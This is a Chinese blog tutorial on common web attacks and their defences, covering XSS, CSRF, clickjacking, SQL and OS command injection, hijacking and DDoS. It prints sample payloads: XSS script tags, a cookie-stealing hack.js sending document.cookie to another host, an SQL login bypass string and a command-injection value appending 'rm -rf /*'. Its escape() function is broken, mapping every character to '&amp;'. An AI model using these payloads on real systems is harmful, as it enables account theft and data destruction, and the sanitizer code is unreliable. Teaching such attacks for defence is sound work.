常见web攻击

最新推荐文章于 2025-03-17 20:10:47 发布
最新推荐文章于 2025-03-17 20:10:47 发布
阅读量304 收藏 1
点赞数
分类专栏: JS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_35828720/article/details/104532939
版权

常见的web网络攻击

  • XSS

  • CSRF

  • 点击劫持

  • SQL注入

  • OS注入

  • 请求劫持

  • DDOS

1. XSS

cross site scripting,跨站脚本攻击,

跨站脚本攻击是指通过存在安全漏洞的web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击

1.1 造成的影响

  • 利用虚拟输入表单骗取用户个人信息

  • 利用脚本窃取用户的cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求

  • 显示伪造的文章或图片

1.2 XSS攻击分类

1.2.1 发射型-url参数直接注入

 //1,alert尝试网站是否有漏洞
 http://localhost:8080/?name=<script>alert(1)<script>
 ​
 //2.获取cookie
 http://localhost:8080/?name=<script src='http://localhost:3000/hack.js'><script>
 ​
 //短域名伪造:https://dwz/cn/

hack.js

 let img=new Image()
 img.src='http://localhost:3000/?a='+document.cookie

1.2.2 存储型-存储到数据库后读取时注入

一般是表单提交,比如我们常见的评论

 //评论
 //1.alert尝试网站是否有漏洞
 <script>alter(1)</script>
 ​
 //2.跨站脚本注入
 美女加v<script src='http://localhost:3000/hack.js'></script>

1.3 XSS攻击的危害

  • 获取页面数据

  • 获取cookie

  • 劫持前端逻辑

  • 发送请求

  • 偷取网站的任意数据

  • 偷取用户的资料

  • 偷取用户的秘密和登录态

  • 欺骗用户

1.4 防范措施

1.4.1 ejs转义

 <% 代码 %> 用于执行其中JavaScript代码
 <%= 代码 %> 会对代码进行html转义
 <%- 代码 %> 将不会进行转义

1.4.2 Head

 ctx.set('X-XSS-Protection',0) //禁止xss过滤
 ​
 http://localhost:8080/?name=<script>alert(1)<script> 可以拦截 但伪装一下就不行了

  • 0 禁止XSS过滤

  • 1 启用XSS过滤(通常浏览器是默认开启的),如果检测到跨站脚本攻击,浏览器将清除页面(删除不安全的部分)

1.4.3 CSP

内容安全策略:是一个附加安全层,用于帮助检测和缓解某些类型的攻击,包括跨站脚本(XSS)和数据注入等攻击。这些攻击可用于实现从数据窃取到网站破坏或做恶意软件分发版本等用途

CSP本质上就是建立白名单,开发者明确告诉浏览器那些外部资源可以加载和执行。我们只需要配置规则,如何拦截是有浏览器自己实现的。我们可以通过这种方式来尽量减少XSS攻击

 //只允许加载本站资源
 Content-Security-Policy:default-src 'self'
 ​
 //只允许加载 HTTPS 协议图片
 Content-Security-Policy:img-src https://*
 ​
 //不允许加载任何来源框架
 Content-Security-Policy:child-src 'none'
 ctx.set('Content-Security-Policy',"default-src 'self'")

1.4.4 转义字符

用户的输入永远不可信任的,最普通的做法就是转义输入输出的内容,对于引号,尖括号,斜杠进行转义

 function escape(str){
     str=str.replace(/&/g,'&amp;')
     str=str.replace(/</g,'&amp;')
     str=str.replace(/>/g,'&amp;')
     str=str.replace(/&/g,'&amp;')
     str=str.replace(/"/g,'&amp;')
     str=str.replace(/''/g,'&amp;')
     str=str.replace(/`/g,'&amp;')
     str=str.replace(/\//g,'&amp;')
     return str
 }

富文本来说,显然不能通过上面的办法来转义所有字符,因为这样会把需要的格式也过滤掉,对于这种情况,通常采用白名单过滤的办法,当然也可以通过黑名单过滤,但是考虑到需要过滤的标签和标签的属性是在太多,更加推荐使用白名单的方式

 const xss=require('xss')
 let html=xss('')

1.4.5 httpOnly cookie

这是预防xss攻击窃取用户cookie最有效的防御手段,web应用程序在设置cookie时,将其属性设为httpOnly,就可以避免该网页的cookie被客户端恶意窃取,保护用户cookie信息

 response.addHeader('Set-Cookie','uid=112; Path=/; HttpOnly')

2. CSRF

CSRF,跨站请求伪造,是一种常见的web攻击,他利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作

  • 用户已经登录了站点A,并在本地记录了cookie

  • 在用户没有登出站点A的情况下(也就是cookie生效的情况下),访问了恶意攻击者提供的引诱危险站点B(B站点要求访问站点A)

  • 站点A没有做任何CSRF防御

2.1 CSRF攻击危害

  • 利用用户登录态

  • 用户不知情

  • 完成业务请求

  • 窃取用户资金(转账,消费)

  • 冒充用户发帖

  • 损害网站声誉

2.2 防御

  • 进制第三方网站带cookie(存在兼容问题)

  • Referer Check -Https不发送referer

  • 验证码

3. 点击劫持-clickjacking

点击劫持是一种视觉欺骗的攻击手段,攻击者将需要攻击的网站通过iframe嵌套的方式嵌入自己的网页中,并将iframe设置为透明,在页面中透出一个按钮诱导用户点击

3.1 防御

3.1.1 X-FRAME-OPTIONS

X-FRAME-OPTIONS是一个http请求头,在现代浏览器有一个很好的支持,这个http响应头就是为了防御用iframe嵌套的点击劫持攻击

响应头有三个值可选:

  • DENY,表示页面不允许通过iframe的方式展示

  • SAMEORIGIN,表示页面可以在相同域名下通过iframe的方式展示

  • ALLOW-FROM,表示页面可以在指定来源的iframe中展示

 ctx.set('X-FRAME-OPTIONS','DENY')

3.1.2 JS方式

 <head>
     <style>
         html{
             display:none !important;
         }
     </style>
     <body>
         <script>
             if(self==top){
                 var style=document.getElementById('click-jack')
                 document.body.removeChild(style)
                }else{
                    top.location=self.location
                }
         </script>
     </body>
 </head>

通过以上两种方式在攻击者通过iframe的方式加载页面是,攻击者的网页直接不显示所有内容了

4. SQL注入

 //填入特殊密码
 1 'or' 1 '=' 1
 ​
 //拼接后的SQL
 SELECT *
 FROM test.user
 WHERE username='111'
 AND password='1' or '1'='1'

4.1 防御

  • 所有的查询语句建议使用数据库提供的参数化查询接口**,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中,即不要直接拼接SQL语句。

 const sql=`
     select *
     from test.user
     where username= ?
     and password=?
 `
 res=await query(sql,[ctx.request.body.username,ctx.request.body.password])

  • 严格限制web应用的数据库的操作权限

  • 后台代码检查输入的数据是否符合预期

  • 对进入数据库的特殊字符进行转义处理

5. OS命令注入

OS命令注入和SQL注入差不多,只不过SQL注入是针对数据库的,而OS命令注入是针对操作系统的。OS命令注入攻击指通过web应用,执行非法的操作系统命令到攻击的目标。只要在能调用Shell函数的地方就有存在被攻击的风险。倘若调用shell是内存疏漏,就可以执行插入的非法命令

 //以node.js 为例,假如在接口中需要从github下载用户指定的repo
 const exec=require('mz/child_process').exex
 let params={/*用户输入的参数*/}
 exec(`git clone ${params.repo} /some/path`)

若果传入的参数是会怎样

 https://github.com/xx/xx.git && rm -rf /* &&

6. 请求劫持

  • DNS劫持:DNS服务器(DNS解析各个步骤)被篡改, 修改了域名解析的结果,使的访问的不是预期的ip

  • HTTP劫持 运营商劫持 此时大概只能升级HTTPS

7. DDOS

DDOS不是一种攻击,而是一大类攻击的总称。它有几十种类型,新的攻击方法还在不断发明出来。网站运行的各个环节,都可以是攻击目标。只要把一个环节攻破,使的整个流程跑不起来,就达到了瘫痪服务器的目的

其实,比较常见的一种攻击是cc攻击,她就是简单粗暴的送来大量正常的请求,超出服务器的最大承受量,导致死机

7.1 防御

 - 备份网站
     备份网站不一定是全功能的,如果能做到全静态浏览,就能满足需求。最低限度应该可以显示公告,告诉用户,网站出了问题,正在全力抢修
 - HTTP 请求的拦截
     硬件 服务器 防火墙
 -   带宽扩容+CDN
     提高犯罪成本
Web常见攻击方式
javagty6778的博客
03-03 1206
在上段代码中,我们可以看到攻击者在它的页面上构建了一个隐藏的表单,该表单内容就是一个某网站的转账接口,当用户打开该站点之后,这个表单就会被自动执行提交;攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击的网站发送跨站请求。4.当小明看到广告,点开链接,这时,恶意代码就存在在了小明的浏览器上,由于小明的淘宝处于登录状态,所以恶意代码可以获取小明的Cookie,故也能。诱骗用户点击URL带攻击代码的链接,服务器解析后响应,在返回的响应内容中隐藏和嵌入攻击者的XSS代码,被浏览器执行,从而攻击用户。
常见web攻击总结
ltycsdn007的博客
09-05 1456
Web开发离不开安全这个话题,确保网站或者网页应用的安全性,是每个开发人员都应该了解的事。本篇主要简单介绍在Web领域几种常见攻击手段及Java Web中的预防方式。 XSS SQL注入 DDOS CSRF 1. XSS 什么是XSS XSS攻击:跨站脚本攻击(Cross-Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆...
浅谈常见的几种web攻击
WKY_优快云的博客
05-12 836
一、Dos攻击(Denial of Service attack) 是一种针对服务器的能够让服务器呈现静止状态的攻击方式。有时候也加服务停止攻击或拒绝服务攻击。其原理就是发送大量的合法请求到服务器,服务器无法分辨这些请求是正常请求还是攻击请求,所以都会照单全收。海量的请求会造成服务器停止工作或拒绝服务的状态。这就是Dos攻击。 二、跨站点请求伪造(CSRF,Cross-Site Req
一文搞懂Web常见攻击方式
最新发布
qq_44005305的博客
03-17 774
Web攻击WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为如植入恶意代码,修改网站权限,获取网站用户隐私信息等等Web应用程序的安全性是任何基于Web业务的重要组成部分确保Web应用程序安全十分重要,即使是代码中很小的 bug 也有可能导致隐私信息被泄露站点安全就是为保护站点不受未授权的访问、使用、修改和破坏而采取的行为或实践我们常见Web攻击方式有。
常见web攻击整理
qq_42806414的博客
01-29 1191
DNS查询攻击(DNS Query Flood)是向被攻击的服务器发送大量随机生成的域名解析请求,其中大部分请求其实根本就不存在使得服务器承受请求负载,并且通过伪造端口和客户端IP方式,防止查询请求被ACL过滤,从而实现攻击,其中注意DNS查询攻击其实是Dos攻击的一种方式之一。业务漏洞是跟具体的应用程序相关,如参数篡改(连续的发送携带不同请求参数的请求)、重放攻击(发送请求又取消又再发送)、权限控制(即跨权限访问)等。保证源代码、过滤用户提交的数据与特殊字符、敏感信息加密传输、服务器配置的安全等。
web常见攻击方式
热门推荐
weixin_50736511的博客
04-18 1万+
xss攻击 用户通过浏览器访问web网页,xss攻击通过各种办法在用户访问页面的时候,插入一些自己的代码或者脚本,让用户访问页面的时候,就可以执行这个脚本,攻击者通过插入的脚本的执行就会获得一些信息(比如cookie),发送到攻击者自己的网站,这就是跨站 xss的危害 1.挂马 把一个木马程序插入一个网站中,利用木马生成器生成一个网码,在传到服务器上,加上一写代码就可以让这个木马程序在打开网页的时候运行, 2.盗取用户的cookie 3.DDOS(拒绝服务)客户端浏览器 4.钓鱼攻击 5.删除目标文章,恶意
web-security:常见web攻击总结
05-09
新建post数据库,导入post.sql。 模拟XSS,运行xss module中的... ... 模拟csrf,启动csrf-defence module中application,端口是8081,此为被攻击网站,启动 csrf-attack中的CSRFApplication,端口为8082,此为攻击网站。
常见Web攻击手段及安全防范.docx
09-07
常见Web攻击手段及安全防范.docx
常见web攻击手段及防御措施
qq_36737839的博客
12-30 1421
CSRF 攻击:跨站请求伪造 跨站请求伪造 CSRF (Cross-site request forgery),是一种挟制用户在当前已登录的 Web 应用程序上执行非本意操作的攻击方法。 ​ 它利用用户已经登录的身份信息,在用户无感的情况下,以用户的名义完成操作。 攻击流程 ​ 一次 CSRF 攻击发生的过程可能是这样: ​ 我们来简述一下图示流程: ​ A. 用户 A 登录购物网站 http://www.example.shop,并获取到 cookie。 ​ B. 攻击者事先知道该购物网站
web安全知识点(常见web攻击总结)
yin_fei_lnmp的博客
06-03 2330
目录一、XSS—跨站脚本攻击1、原理2、非持久XSS(反射型XSS)2.1、特点2.2、如何防止3、持久性XSS(存储型XSS)3.1、条件3.2、特点二、CSRF—跨站请求伪造攻击1、原理2、条件3、预防CSRF三、SQL注入1、原理2、预防四、命令行注入五、DDOS攻击—分布式拒绝服务攻击1、原理2、网络层DDOS2.1、SYN flood2.2、ACK flood2.3、UDP flood2.4、ICMP flood2.5、网络层DDOS防御3、应用层DDOS3.1、CC攻击3.2、DNS flood
常见web网站攻击
trenki的博客
06-27 1210
1.XSS跨站脚本攻击 XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的非本站点HTML标签或JavaScript进行的一种攻击常见攻击手段: 攻击手段: 1.利用url参数直接注入:http://localhost/?from=\<script>任意代码\</script>,某些网站会直接将url的参数读取再写入到网页。 2.存储到数据库之后再读
常见web攻击有那些
2401_88751384的博客
12-19 794
XSS攻击:跨站脚本攻击(Cross-Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。XSS是一种常见web安全漏洞,它允许攻击者将恶意代码植入到提供给其它用户使用的页面中。不同于大多数攻击(一般只涉及攻击者和受害者),XSS涉及到三方,即攻击者、客户端与Web应用。XSS的攻击目标是为了盗取存储在客户端的cookie或者其他网站用于识别客户端身份的敏感信息。
常见web攻击有哪些?如何防御?
weixin_46886227的博客
04-03 7492
web攻击是什么 Web攻击(WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为,如植入恶意代码、修改网站权限、获取网站用户隐私信息等 Web应用程序的安全性是任何基于Web业务的重要组成部分 确保Web应用程序的安全十分重要,即使是代码中很小的bug也有可能导致隐私信息被泄露,站点安全就是为了保护站点不受未授权的访问、使用、修改和破坏而采取的行为或实践 常见Web攻击有: XSS (Cross Site Scripting) 跨站脚本攻击 CSRF(Cross-site
常见Web攻击方式有哪些?黑客:28种总有一款适合你
A1_3_9_7的博客
12-28 1088
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Web攻击
AD_Niko的博客
08-12 459
Web攻击 一、模式: 1.主动攻击攻击者主动将攻击代码传入Web应用 2.被动模式:设计攻击代码陷阱,诱使正常用户向Web应用发送含有该攻击代码的请求,浏览器运行攻击代码,用户个人信息将泄漏,或其个人权限被滥用。 二、因输出值转义不完全引发的安全漏洞 1.跨站脚本攻击(XSS):将恶意脚本嵌入链接中(反射型);上传恶意数据到数据库(如留言板等地方,持久型) https://blog.csdn....
15种常见Web 安全攻击类型以及防御手段
乐闻世界
10-28 2477
随着互联网的发展,Web 应用变得越来越普及,随之而来的安全威胁也越来越多样化。作为一个高级计算机工程师,我今天将通俗易懂地为大家介绍几种常见Web 安全威胁与攻击类型。通过了解这些威胁,大家可以更好地保护自己的 Web 应用和个人信息。Web 安全威胁类型繁多,攻击手段不断变化,了解和防御这些常见Web 安全威胁对每个开发者和用户来说都是至关重要的。保持警惕,及时更新你的技能和知识,可以更好地保护你的 Web 应用和用户的数据。
常见几种web攻击方式和防御方法
weixin_43837229的博客
08-04 2815
1、SQL 注入 2、CSRF 3、XSS 4、DDOS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值